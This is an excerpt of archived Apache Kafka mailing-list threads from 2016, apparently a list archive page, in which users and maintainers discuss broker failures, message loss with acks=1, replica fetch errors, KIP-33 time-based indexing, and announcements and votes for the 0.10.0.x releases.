to truncate some previous committed messages and then immediately becomes
the new leader. This can potentially cause the FATAL error. We do plan to
fix KAFKA-1211 in the future, but it may take some time.

Thanks,

Jun

On Fri, Aug 26, 2016 at 6:53 AM, Bryan Baugher  wrote:

> We didn't suffer any data loss nor was there any power outage that I know
> of.
>
> On Fri, Aug 26, 2016 at 5:14 AM Khurrum Nasim 
> wrote:
>
> > On Tue, Aug 23, 2016 at 9:00 AM, Bryan Baugher  wrote:
> > >
> > > > Hi everyone,
> > > >
> > > > Yesterday we had lots of network failures running our Kafka cluster
> > > > (0.9.0.1 ~40 nodes). We run everything using the higher durability
> > > settings
> > > > in order to avoid in data loss, producers use all/-1 ack,
> > topics/brokers
> > > > have min insync replicas = 2. unclean leader election = false, and
> all
> > > > topics have 3 replicas.
> > >
> >
> > We also hit a few similar data loss issues before. It made us concerned
> > about putting critical data into Kafka.
> > Apache DistributedLog seems to be very cool at durability and strong
> > consistency. We are actually evaluating
> > it as kafka's backend.
> >
> > - KN
> >
> >
> > > >
> > > > This isn't the first time this has happened to us. When trying to
> bring
> > > the
> > > > cluster back online brokers would die on start up with,
> > > >
> > > > 2016-08-22 16:49:34,365 FATAL kafka.server.ReplicaFetcherThread:
> > > > [ReplicaFetcherThread-2-6], Halting because log truncation is not
> > allowed
> > > > for topic XXX, Current leader 6's latest offset 333005055 is less
> than
> > > > replica 31's latest offset 333005155
> > > >
> > > > In this case the broker we were starting (31) had a higher offset
> then
> > > the
> > > > running broker (6).
> > > >
> > > > Our team ended up just trying all different combinations of start
> > orders
> > > to
> > > > get the cluster back online. They managed to get most of them back
> > online
> > > > doing this but struggled with the last couple where they had to copy
> > > kafka
> > > > log files for the partition that was giving us troubles from the 2
> > > > previously in sync with higher offsets to the broker with lower
> offset
> > > but
> > > > was elected leader.
> > > >
> > > > Our guess with why we had so much trouble during start up was it
> seemed
> > > > with so many partitions and a replication factor of 3 we had this
> > spider
> > > > web of partitions and possibly dead lock where some brokers would be
> > the
> > > > appropriate in-sync leaders but not in-sync for other partitions
> which
> > > > would cause brokers to fail on start up.
> > > >
> > > > So from this do you have any suggestions on what we could do better
> > next
> > > > time?
> > > >
> > > > Also doesn't the fact kafka elected a broker as leader with a lower
> > > offset
> > > > mean an unclean leader election occurred? It seems like we are only
> > saved
> > > > by the error message on the other broker's during start up indicating
> > it
> > > > happened and the fact we set min insync replicas to 2 / acks =
> -1/all,
> > > > otherwise writes could come in to that leader and then the offset
> could
> > > be
> > > > higher and I would imagine no error would occur.
> > > >
> > >
> > >
> > >
> > > --
> > > -- Guozhang
> > >
> >
>

Re: Networking errors and durability settings

2016-08-25 Thread Jun Rao

Bryan,

https://issues.apache.org/jira/browse/KAFKA-3410 reported a similar issue
but only happened when the leader broker's log was manually deleted. In
your case, was there any data loss in the broker due to things like power
outage?

Thanks,

Jun

On Tue, Aug 23, 2016 at 9:00 AM, Bryan Baugher  wrote:

> Hi everyone,
>
> Yesterday we had lots of network failures running our Kafka cluster
> (0.9.0.1 ~40 nodes). We run everything using the higher durability settings
> in order to avoid in data loss, producers use all/-1 ack, topics/brokers
> have min insync replicas = 2. unclean leader election = false, and all
> topics have 3 replicas.
>
> This isn't the first time this has happened to us. When trying to bring the
> cluster back online brokers would die on start up with,
>
> 2016-08-22 16:49:34,365 FATAL kafka.server.ReplicaFetcherThread:
> [ReplicaFetcherThread-2-6], Halting because log truncation is not allowed
> for topic XXX, Current leader 6's latest offset 333005055 is less than
> replica 31's latest offset 333005155
>
> In this case the broker we were starting (31) had a higher offset then the
> running broker (6).
>
> Our team ended up just trying all different combinations of start orders to
> get the cluster back online. They managed to get most of them back online
> doing this but struggled with the last couple where they had to copy kafka
> log files for the partition that was giving us troubles from the 2
> previously in sync with higher offsets to the broker with lower offset but
> was elected leader.
>
> Our guess with why we had so much trouble during start up was it seemed
> with so many partitions and a replication factor of 3 we had this spider
> web of partitions and possibly dead lock where some brokers would be the
> appropriate in-sync leaders but not in-sync for other partitions which
> would cause brokers to fail on start up.
>
> So from this do you have any suggestions on what we could do better next
> time?
>
> Also doesn't the fact kafka elected a broker as leader with a lower offset
> mean an unclean leader election occurred? It seems like we are only saved
> by the error message on the other broker's during start up indicating it
> happened and the fact we set min insync replicas to 2 / acks = -1/all,
> otherwise writes could come in to that leader and then the offset could be
> higher and I would imagine no error would occur.
>

Re: KIP-33 Opt out from Time Based indexing

2016-08-25 Thread Jun Rao

log.roll.ms defaults to ~>7 days.
>
>
> second odd thing:
> Quote
> ---
> A time index entry (*T*, *offset*) means that in this segment any message
> whose timestamp is greater than *T* come after *offset.*
>
> The OffsetRequest behaves almost the same as before. If timestamp *T* is
> set in the OffsetRequest, the first offset in the returned offset sequence
> means that if user want to consume from *T*, that is the offset to start
> with. The guarantee is that any message whose timestamp is greater than T
> has a bigger offset. i.e. Any message before this offset has a timestamp <
> *T*.
> ---
>
> Given how the index is maintained, with a little bit of bad luck (rolling
> upgrade/config change of mirrormakers for different colocations) one ends
> with segmentN.timeindex.maxtimestamp > segmentN+1.timeindex.maxtimestamp.
> If I do not overlook something here, then the fetch code does not seem to
> take that into account.
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/Log.scala#L604
> In this case the Goal listed number 1, not loose any messages, is not
> achieved. easy fix seems to be to sort the segsArray by maxtimestamp but
> can't wrap my head around it just now.
>
>
> third odd thing:
> Regarding the worry of increasing complexity. Looking at the code
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L193 -196
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L227 & 230
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L265 -266
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L305 -307
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L408 - 410
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L432 - 435
> https://github.com/apache/kafka/blob/05d00b5aca2e1e59ad685a3f051d2a
> b022f75acc/core/src/main/scala/kafka/log/LogSegment.scala#L104 -108
> and especially
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/Log.scala#L717
> it feels like the Log & Log segment having a detailed knowledge about the
> maintained indexes is not the ideal way to model the problem.
> Having the Server maintian a Set of Indexes could reduce the code
> complexity, while also allowing an easy switch to turn it off. I think both
> indexes could point to the physical position, a client would do
> fetch(timestamp), and the continue with the offsets as usual. Is there any
> specific reason the timestamp index points into the offset index?
> For reading one would need to branch earlier, maybe already in ApiHandler
> and decide what indexes to query, but this branching logic is there now
> anyhow.
>
> Further I also can't think of a situation where one wants to have this
> log.message.timestamp.difference.max.ms take effect. I think this defeats
> goal 1 again.
>
> ITE having this index in the brokers now feels wired to me. Gives me a
> feeling of complexity that I don't need and have a hard time figuring out
> how much other people can benefit from it. I hope that this feedback is
> useful and helps to understand my scepticism regarding this thing. There
> were some other oddities that I have a hard time recalling now. So i guess
> the index was build for a specific confluent customer, will there be any
> blogpost about their usecase? or can you share it?
>
> Best Jan
>
>
> On 24.08.2016 16:47, Jun Rao wrote:
>
> Jan,
>
> Thanks for the reply. I actually wasn't sure what your main concern on
> time-based rolling is. Just a couple of clarifications. (1) Time-based
> rolling doesn't control how long a segment will be retained for. For
> retention, if you use time-based, it will now be based on the timestamp in
> the message. If you use size-based, it works the same as before. Is your
> concern on time-based retention? If so, you can always configure the
> timestamp in all topics to be log append time, which will give you the same
> behavior as before. (2) The creation time of the segment is never exposed
> to the consumer and therefore is never preserved in MirrorMaker. In
> contrast, the timestamp in the message will be preserved in MirrorMaker.
> So, not sure what your concern on MirrorMaker is.
>
> Jun
>
> On Wed, Aug 24, 2016 at 5:03 AM, Jan Fili

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-19 Thread Jun Rao

Mazhar,

Let's first confirm if this is indeed a bug. As I mentioned earlier, it's
possible to have message loss with ack=1 when there are (leader) broker
failures. If this is not the case, please file a jira and describe how to
reproduce the problem. Also, it would be useful to know if the message loss
happens with the java producer too. This will help isolate whether this is
a server side or a client side issue.

Thanks,

Jun

On Fri, Aug 19, 2016 at 2:15 AM, Mazhar Shaikh <mazhar.shaikh...@gmail.com>
wrote:

> Hi Jun,
>
> In my earlier runs, I had enabled delivery report (with and without offset
> report) facility provided by librdkafka.
>
> The producer has received successful delivery report for the all msg sent
> even than the messages where lost.
>
> as you mentioned. producer has nothing to do with this loss of messages.
>
> I just want to know, as when can we get the fix for this bug ?
>
> Thanks.
>
> Regards,
> Mazhar Shaikh
>
>
> On Fri, Aug 19, 2016 at 1:24 AM, Jun Rao <j...@confluent.io> wrote:
>
> > Mazhar,
> >
> > With ack=1, whether you lose messages or not is not deterministic. It
> > depends on the time when the broker receives/acks a message, the follower
> > fetches the data and the broker fails. So, it's possible that you got
> lucky
> > in one version and unlucky in another.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Aug 18, 2016 at 12:11 PM, Mazhar Shaikh <
> > mazhar.shaikh...@gmail.com>
> > wrote:
> >
> > > Hi Jun,
> > >
> > > Thanks for clarification, I'll give a try with ack=-1 (in producer).
> > >
> > > However, i did a fallback to older version of kafka
> > (*kafka_2.10-0.8.2.1*),
> > > and i don't see this issue (loss of messages).
> > >
> > > looks like kafka_2.11-0.9.0.1 has issues(BUG) during replication.
> > >
> > > Thanks,
> > >
> > > Regards,
> > > Mazhar Shaikh.
> > >
> > >
> > >
> > > On Thu, Aug 18, 2016 at 10:30 PM, Jun Rao <j...@confluent.io> wrote:
> > >
> > > > Mazhar,
> > > >
> > > > There is probably a mis-understanding. Ack=-1 (or all) doesn't mean
> > > waiting
> > > > for all replicas. It means waiting for all replicas that are in sync.
> > So,
> > > > if a replica is down, it will be removed from the in-sync replicas,
> > which
> > > > allows the producer to continue with fewer replicas.
> > > >
> > > > For the connection issue that you saw in the log, this could happen
> > when
> > > a
> > > > connection is idle for some time. It won't break the replication
> logic
> > > > since a new connection will be created automatically. You can
> increase
> > > the
> > > > socket idle time on the broker if you want to turn off this behavior.
> > > >
> > > > Thanks,
> > > >
> > > > Jun
> > > >
> > > > On Thu, Aug 18, 2016 at 12:07 AM, Mazhar Shaikh <
> > > > mazhar.shaikh...@gmail.com>
> > > > wrote:
> > > >
> > > > > Hi Jun,
> > > > >
> > > > > Setting to -1, may solve this issue.
> > > > > But it will cause producer buffer full in load test resulting to
> > > failures
> > > > > and drop of messages from client(producer side)
> > > > > Hence, this will not actually solve the problem.
> > > > >
> > > > > I need to fix this from kafka broker side, so that there is no
> impact
> > > on
> > > > > producer or consumer.
> > > > >
> > > > > From the logs looks like there is connection problem during between
> > > > brokers
> > > > > and kafka broker is loosing records during this process.
> > > > >
> > > > > But why is kafka broker loosing records,
> > > > >
> > > > > I feel this is a BUG in kafka.
> > > > >
> > > > > [2016-08-17 12:54:50,293] TRACE [Controller 2]: checking need to
> > > trigger
> > > > > partition rebalance (kafka.controller.KafkaController)
> > > > > [2016-08-17 12:54:50,294] DEBUG [Controller 2]: preferred replicas
> by
> > > > > broker Map(0 -> Map([topic1,45] -> List(0, 1), [topic1,17] ->
> List(0,
> > > 1),
> > > > > [topic1,19] -> List(0, 1), [topic1,42] -> List(0, 1), [topic1,43]
> ->
> > > > > List(0,

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-18 Thread Jun Rao

Mazhar,

With ack=1, whether you lose messages or not is not deterministic. It
depends on the time when the broker receives/acks a message, the follower
fetches the data and the broker fails. So, it's possible that you got lucky
in one version and unlucky in another.

Thanks,

Jun

On Thu, Aug 18, 2016 at 12:11 PM, Mazhar Shaikh <mazhar.shaikh...@gmail.com>
wrote:

> Hi Jun,
>
> Thanks for clarification, I'll give a try with ack=-1 (in producer).
>
> However, i did a fallback to older version of kafka (*kafka_2.10-0.8.2.1*),
> and i don't see this issue (loss of messages).
>
> looks like kafka_2.11-0.9.0.1 has issues(BUG) during replication.
>
> Thanks,
>
> Regards,
> Mazhar Shaikh.
>
>
>
> On Thu, Aug 18, 2016 at 10:30 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Mazhar,
> >
> > There is probably a mis-understanding. Ack=-1 (or all) doesn't mean
> waiting
> > for all replicas. It means waiting for all replicas that are in sync. So,
> > if a replica is down, it will be removed from the in-sync replicas, which
> > allows the producer to continue with fewer replicas.
> >
> > For the connection issue that you saw in the log, this could happen when
> a
> > connection is idle for some time. It won't break the replication logic
> > since a new connection will be created automatically. You can increase
> the
> > socket idle time on the broker if you want to turn off this behavior.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Aug 18, 2016 at 12:07 AM, Mazhar Shaikh <
> > mazhar.shaikh...@gmail.com>
> > wrote:
> >
> > > Hi Jun,
> > >
> > > Setting to -1, may solve this issue.
> > > But it will cause producer buffer full in load test resulting to
> failures
> > > and drop of messages from client(producer side)
> > > Hence, this will not actually solve the problem.
> > >
> > > I need to fix this from kafka broker side, so that there is no impact
> on
> > > producer or consumer.
> > >
> > > From the logs looks like there is connection problem during between
> > brokers
> > > and kafka broker is loosing records during this process.
> > >
> > > But why is kafka broker loosing records,
> > >
> > > I feel this is a BUG in kafka.
> > >
> > > [2016-08-17 12:54:50,293] TRACE [Controller 2]: checking need to
> trigger
> > > partition rebalance (kafka.controller.KafkaController)
> > > [2016-08-17 12:54:50,294] DEBUG [Controller 2]: preferred replicas by
> > > broker Map(0 -> Map([topic1,45] -> List(0, 1), [topic1,17] -> List(0,
> 1),
> > > [topic1,19] -> List(0, 1), [topic1,42] -> List(0, 1), [topic1,43] ->
> > > List(0, 1), [topic1,44] -> List(0, 1), [topic1,16] -> List(0, 1),
> > > [topic1,46] -> List(0, 1), [topic1,20] -> List(0, 1), [topic1,41] ->
> > > List(0, 1), [topic1,18] -> List(0, 1), [topic1,22] -> List(0, 1),
> > > [topic1,40] -> List(0, 1), [topic1,47] -> List(0, 1), [topic1,23] ->
> > > List(0, 1), [topic1,21] -> List(0, 1)), 5 -> Map([topic1,78] -> List(5,
> > 3),
> > > [topic1,84] -> List(5, 3), [topic1,87] -> List(5, 3), [topic1,74] ->
> > > List(5, 3), [topic1,81] -> List(5, 3), [topic1,73] -> List(5, 3),
> > > [topic1,80] -> List(5, 3), [topic1,77] -> List(5, 3), [topic1,75] ->
> > > List(5, 3), [topic1,85] -> List(5, 3), [topic1,76] -> List(5, 3),
> > > [topic1,83] -> List(5, 3), [topic1,86] -> List(5, 3), [topic1,72] ->
> > > List(5, 3), [topic1,79] -> List(5, 3), [topic1,82] -> List(5, 3)), 1 ->
> > > Map([topic1,92] -> List(1, 0), [topic1,95] -> List(1, 0), [topic1,69]
> ->
> > > List(1, 0), [topic1,93] -> List(1, 0), [topic1,70] -> List(1, 0),
> > > [topic1,67] -> List(1, 0), [topic1,65] -> List(1, 0), [topic1,88] ->
> > > List(1, 0), [topic1,90] -> List(1, 0), [topic1,66] -> List(1, 0),
> > > [topic1,94] -> List(1, 0), [topic1,64] -> List(1, 0), [topic1,89] ->
> > > List(1, 0), [topic1,68] -> List(1, 0), [topic1,71] -> List(1, 0),
> > > [topic1,91] -> List(1, 0)), 2 -> Map([topic1,8] -> List(2, 4),
> [topic1,3]
> > > -> List(2, 4), [topic1,15] -> List(2, 4), [topic1,2] -> List(2, 4),
> > > [topic1,1] -> List(2, 4), [topic1,6] -> List(2, 4), [topic1,9] ->
> List(2,
> > > 4), [topic1,12] -> List(2, 4), [topic1,14] -> List(2, 4), [topic1,11]
> ->
> > > List(2, 4), [topic1,13] -> List(2, 4)

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-18 Thread Jun Rao

c1,33], [topic1,28]) (kafka.controller.
> IsrChangeNotificationListener)
> [2016-08-17 13:05:42,690] DEBUG [IsrChangeNotificationListener] Fired!!!
> (kafka.controller.IsrChangeNotificationListener)
> [2016-08-17 13:09:50,293] TRACE [Controller 2]: checking need to trigger
> partition rebalance (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] DEBUG [Controller 2]: preferred replicas by
> broker Map(0 -> Map([topic1,45] -> List(0, 1), [topic1,17] -> List(0, 1),
> [topic1,19] -> List(0, 1), [topic1,42] -> List(0, 1), [topic1,43] ->
> List(0, 1), [topic1,44] -> List(0, 1), [topic1,16] -> List(0, 1),
> [topic1,46] -> List(0, 1), [topic1,20] -> List(0, 1), [topic1,41] ->
> List(0, 1), [topic1,18] -> List(0, 1), [topic1,22] -> List(0, 1),
> [topic1,40] -> List(0, 1), [topic1,47] -> List(0, 1), [topic1,23] ->
> List(0, 1), [topic1,21] -> List(0, 1)), 5 -> Map([topic1,78] -> List(5, 3),
> [topic1,84] -> List(5, 3), [topic1,87] -> List(5, 3), [topic1,74] ->
> List(5, 3), [topic1,81] -> List(5, 3), [topic1,73] -> List(5, 3),
> [topic1,80] -> List(5, 3), [topic1,77] -> List(5, 3), [topic1,75] ->
> List(5, 3), [topic1,85] -> List(5, 3), [topic1,76] -> List(5, 3),
> [topic1,83] -> List(5, 3), [topic1,86] -> List(5, 3), [topic1,72] ->
> List(5, 3), [topic1,79] -> List(5, 3), [topic1,82] -> List(5, 3)), 1 ->
> Map([topic1,92] -> List(1, 0), [topic1,95] -> List(1, 0), [topic1,69] ->
> List(1, 0), [topic1,93] -> List(1, 0), [topic1,70] -> List(1, 0),
> [topic1,67] -> List(1, 0), [topic1,65] -> List(1, 0), [topic1,88] ->
> List(1, 0), [topic1,90] -> List(1, 0), [topic1,66] -> List(1, 0),
> [topic1,94] -> List(1, 0), [topic1,64] -> List(1, 0), [topic1,89] ->
> List(1, 0), [topic1,68] -> List(1, 0), [topic1,71] -> List(1, 0),
> [topic1,91] -> List(1, 0)), 2 -> Map([topic1,8] -> List(2, 4), [topic1,3]
> -> List(2, 4), [topic1,15] -> List(2, 4), [topic1,2] -> List(2, 4),
> [topic1,1] -> List(2, 4), [topic1,6] -> List(2, 4), [topic1,9] -> List(2,
> 4), [topic1,12] -> List(2, 4), [topic1,14] -> List(2, 4), [topic1,11] ->
> List(2, 4), [topic1,13] -> List(2, 4), [topic1,0] -> List(2, 4), [topic1,4]
> -> List(2, 4), [topic1,5] -> List(2, 4), [topic1,10] -> List(2, 4),
> [topic1,7] -> List(2, 4)), 3 -> Map([topic1,33] -> List(3, 5), [topic1,30]
> -> List(3, 5), [topic1,24] -> List(3, 5), [topic1,36] -> List(3, 5),
> [topic1,38] -> List(3, 5), [topic1,26] -> List(3, 5), [topic1,27] ->
> List(3, 5), [topic1,39] -> List(3, 5), [topic1,29] -> List(3, 5),
> [topic1,34] -> List(3, 5), [topic1,28] -> List(3, 5), [topic1,32] ->
> List(3, 5), [topic1,35] -> List(3, 5), [topic1,25] -> List(3, 5),
> [topic1,31] -> List(3, 5), [topic1,37] -> List(3, 5)), 4 -> Map([topic1,53]
> -> List(4, 2), [topic1,56] -> List(4, 2), [topic1,49] -> List(4, 2),
> [topic1,50] -> List(4, 2), [topic1,51] -> List(4, 2), [topic1,58] ->
> List(4, 2), [topic1,63] -> List(4, 2), [topic1,54] -> List(4, 2),
> [topic1,48] -> List(4, 2), [topic1,61] -> List(4, 2), [topic1,62] ->
> List(4, 2), [topic1,57] -> List(4, 2), [topic1,60] -> List(4, 2),
> [topic1,52] -> List(4, 2), [topic1,55] -> List(4, 2), [topic1,59] ->
> List(4, 2))) (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] DEBUG [Controller 2]: topics not in preferred
> replica Map() (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] TRACE [Controller 2]: leader imbalance ratio for
> broker 0 is 0.00 (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] DEBUG [Controller 2]: topics not in preferred
> replica Map() (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] TRACE [Controller 2]: leader imbalance ratio for
> broker 5 is 0.00 (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] DEBUG [Controller 2]: topics not in preferred
> replica Map() (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] TRACE [Controller 2]: leader imbalance ratio for
> broker 1 is 0.00 (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] DEBUG [Controller 2]: topics not

Re: Issue adding server (0.10.0.0)

2016-08-17 Thread Jun Rao

Jarko,

Do you have many topic partitions? Currently, if #partitions *
fetched_bytes in the response exceeds 2GB, we will get an integer overflow
and weird things can happen. We are trying to address this better in
KIP-74. If this is the issue, for now, you can try reducing the fetch size
or increasing the replica fetch threads to work around the issue.

Thanks,

Jun

On Wed, Aug 17, 2016 at 3:04 AM, J Mes  wrote:

> Hello,
>
> I have a cluster of 3 nodes running kafka v.0.10.0.0. This cluster was
> starter about a week ago with no data, no issues starting up.
> Today we noticed 1 of the servers in the cluster did not work anymore, we
> checked and indeed the server was not working anymore and all data was old.
>
> We restarted the node without data, thinking it should sync up and then
> join the cluster again, but we keep getting the following error:
>
> [2016-08-17 12:02:23,620] WARN [ReplicaFetcherThread-0-1], Error in fetch
> kafka.server.ReplicaFetcherThread$FetchRequest@62b3e70c (kafka.server.
> ReplicaFetcherThread)
> org.apache.kafka.common.protocol.types.SchemaException: Error reading
> field 'responses': Error reading field 'partition_responses': Error reading
> field 'record_set': Error reading bytes of size 104856430, only 18764961
> bytes available
> at org.apache.kafka.common.protocol.types.Schema.read(
> Schema.java:73)
> at org.apache.kafka.clients.NetworkClient.parseResponse(
> NetworkClient.java:380)
> at org.apache.kafka.clients.NetworkClient.handleCompletedReceives(
> NetworkClient.java:449)
> at org.apache.kafka.clients.NetworkClient.poll(
> NetworkClient.java:269)
> at kafka.utils.NetworkClientBlockingOps$.recursivePoll$2(
> NetworkClientBlockingOps.scala:136)
> at kafka.utils.NetworkClientBlockingOps$.kafka$utils$
> NetworkClientBlockingOps$$pollContinuously$extension(
> NetworkClientBlockingOps.scala:143)
> at kafka.utils.NetworkClientBlockingOps$.blockingSendAndReceive$
> extension(NetworkClientBlockingOps.scala:80)
> at kafka.server.ReplicaFetcherThread.sendRequest(
> ReplicaFetcherThread.scala:244)
> at kafka.server.ReplicaFetcherThread.fetch(
> ReplicaFetcherThread.scala:229)
> at kafka.server.ReplicaFetcherThread.fetch(
> ReplicaFetcherThread.scala:42)
> at kafka.server.AbstractFetcherThread.processFetchRequest(
> AbstractFetcherThread.scala:107)
> at kafka.server.AbstractFetcherThread.doWork(
> AbstractFetcherThread.scala:98)
> at kafka.utils.ShutdownableThread.run(ShutdownableThread.scala:63)
>
> All nodes are running the exact same version of zookepeer/kafka.
>
> When we clear all data from all nodes and start again, everything works...
>
> Any idea anyone?
>
> Kr,
> Jarko Mesuere

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-17 Thread Jun Rao

Are you using acks=1 or acks=all in the producer? Only the latter
guarantees acked messages won't be lost after leader failure.

Thanks,

Jun

On Wed, Aug 10, 2016 at 11:41 PM, Mazhar Shaikh 
wrote:

> Hi Kafka Team,
>
> I'm using kafka (kafka_2.11-0.9.0.1) with librdkafka (0.8.1) API for
> producer
> During a run of 2hrs, I notice the total number of messaged ack'd by
> librdkafka delivery report is greater than the maxoffset of a partition in
> kafka broker.
> I'm running kafka broker with replication factor of 2.
>
> Here, message has been lost between librdkafka - kafka broker.
>
> As librdkafka is providing success delivery report for all the messages.
>
> Looks like kafka broker is dropping the messages after acknowledging
> librdkafka.
>
> Requesting you help in solving this issue.
>
> Thank you.
>
>
> Regards
> Mazhar Shaikh
>

Re: [kafka-clients] [ANNOUCE] Apache Kafka 0.10.0.1 Released

2016-08-11 Thread Jun Rao

Ismael,

Thanks for running the release.

Jun

On Wed, Aug 10, 2016 at 5:01 PM, Ismael Juma  wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 0.10.0.1.
> This is a bug fix release that fixes 53 issues in 0.10.0.0.
>
> All of the changes in this release can be found in the release notes:
> *https://archive.apache.org/dist/kafka/0.10.0.1/RELEASE_NOTES.html
> *
>
> Apache Kafka is high-throughput, publish-subscribe messaging system
> rethought of as a distributed commit log.
>
> ** Fast => A single Kafka broker can handle hundreds of megabytes of reads
> and writes per second from thousands of clients.
>
> ** Scalable => Kafka is designed to allow a single cluster to serve as the
> central data backbone for a large organization. It can be elastically and
> transparently expanded without downtime. Data streams are partitioned
> and spread over a cluster of machines to allow data streams larger than
> the capability of any single machine and to allow clusters of co-ordinated
> consumers.
>
> ** Durable => Messages are persisted on disk and replicated within the
> cluster to prevent data loss. Each broker can handle terabytes of messages
> without performance impact.
>
> ** Distributed by Design => Kafka has a modern cluster-centric design that
> offers strong durability and fault-tolerance guarantees.
>
> You can download the source release from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.0.1/kafka-0.10.0.1
> -src.tgz
>
> and binary releases from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.0.1/kafka_2.10-0.10
> .0.1.tgz
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.0.1/kafka_2.11-0.10
> .0.1.tgz
>
> A big thank you for the following people who have contributed to the
> 0.10.0.1 release.
>
> Alex Glikson, Alex Loddengaard, Alexey Romanchuk, Ashish Singh, Avi Flax,
> Damian Guy, Dustin Cote, Edoardo Comar, Eno Thereska, Ewen
> Cheslack-Postava, Flavio Junqueira, Florian Hussonnois, Geoff Anderson,
> Grant Henke, Greg Fodor, Guozhang Wang, Gwen Shapira, Henry Cai, Ismael
> Juma, Jason Gustafson, Jeff Klukas, Jendrik Poloczek, Jeyhun Karimov,
> Liquan Pei, Manikumar Reddy O, Mathieu Fenniak, Matthias J. Sax, Maysam
> Yabandeh, Mayuresh Gharat, Mickael Maison, Moritz Siuts, Onur Karaman,
> Philippe Derome, Rajini Sivaram, Rollulus, Ryan Pridgeon, Samuel Taylor,
> Sebastien Launay, Sriharsha Chintalapani, Tao Xiao, Todd Palino, Tom
> Crayford, Tom Rybak, Vahid Hashemian, Wan Wenli, Yuto Kawamura.
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> http://kafka.apache.org/
>
> Thanks,
> Ismael
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAD5tkZZ7xUt7wpuLr8i3isV34L-GB%2BZA9mwkA3HJvASnb5YTUA%
> 40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

Re: [VOTE] 0.10.0.0 RC6

2016-05-19 Thread Jun Rao

Thanks for running the release. +1 from me. Verified the quickstart.

Jun

On Tue, May 17, 2016 at 10:00 PM, Gwen Shapira  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the seventh (!) candidate for release of Apache Kafka
> 0.10.0.0. This is a major release that includes: (1) New message
> format including timestamps (2) client interceptor API (3) Kafka
> Streams.
>
> This RC was rolled out to fix an issue with our packaging that caused
> dependencies to leak in ways that broke our licensing, and an issue
> with protocol versions that broke upgrade for LinkedIn and others who
> may run from trunk. Thanks to Ewen, Ismael, Becket and Jun for the
> finding and fixing of issues.
>
> Release notes for the 0.10.0.0 release:
> http://home.apache.org/~gwenshap/0.10.0.0-rc6/RELEASE_NOTES.html
>
> Lets try to vote within the 72h release vote window and get this baby
> out already!
>
> *** Please download, test and vote by Friday, May 20, 23:59 PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~gwenshap/0.10.0.0-rc6/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * java-doc
> http://home.apache.org/~gwenshap/0.10.0.0-rc6/javadoc/
>
> * tag to be voted upon (off 0.10.0 branch) is the 0.10.0.0 tag:
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=065899a3bc330618e420673acf9504d123b800f3
>
> * Documentation:
> http://kafka.apache.org/0100/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0100/protocol.html
>
> /**
>
> Thanks,
>
> Gwen
>

Re: 0.9.0.1 RC1

2016-02-17 Thread Jun Rao

Christian,

Similar to other Apache projects, a vote from a committer is considered
binding. During the voting process, we encourage non-committers to vote as
well. We will cancel the release even if a critical issue is reported from
a non-committer.

Thanks,

Jun

On Tue, Feb 16, 2016 at 11:05 PM, Christian Posta <christian.po...@gmail.com
> wrote:

> BTW, what's the etiquette for votes (non-binding) for this community?
> welcomed? noise?
> happy to see the non-binding votes, I'd like to contribute, just don't want
> to pollute the vote call. thoughts?
> thanks!
>
> On Tue, Feb 16, 2016 at 10:56 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Thanks everyone for voting. The results are:
> >
> > +1 binding = 4 votes (Ewen Cheslack-Postava, Neha Narkhede, Joel Koshy
> and
> > Jun
> > Rao)
> > +1 non-binding = 3 votes
> > -1 = 0 votes
> > 0 = 0 votes
> >
> > The vote passes.
> >
> > I will release artifacts to maven central, update the dist svn and
> download
> > site. Will send out an announce after that.
> >
> > Thanks,
> >
> > Jun
> >
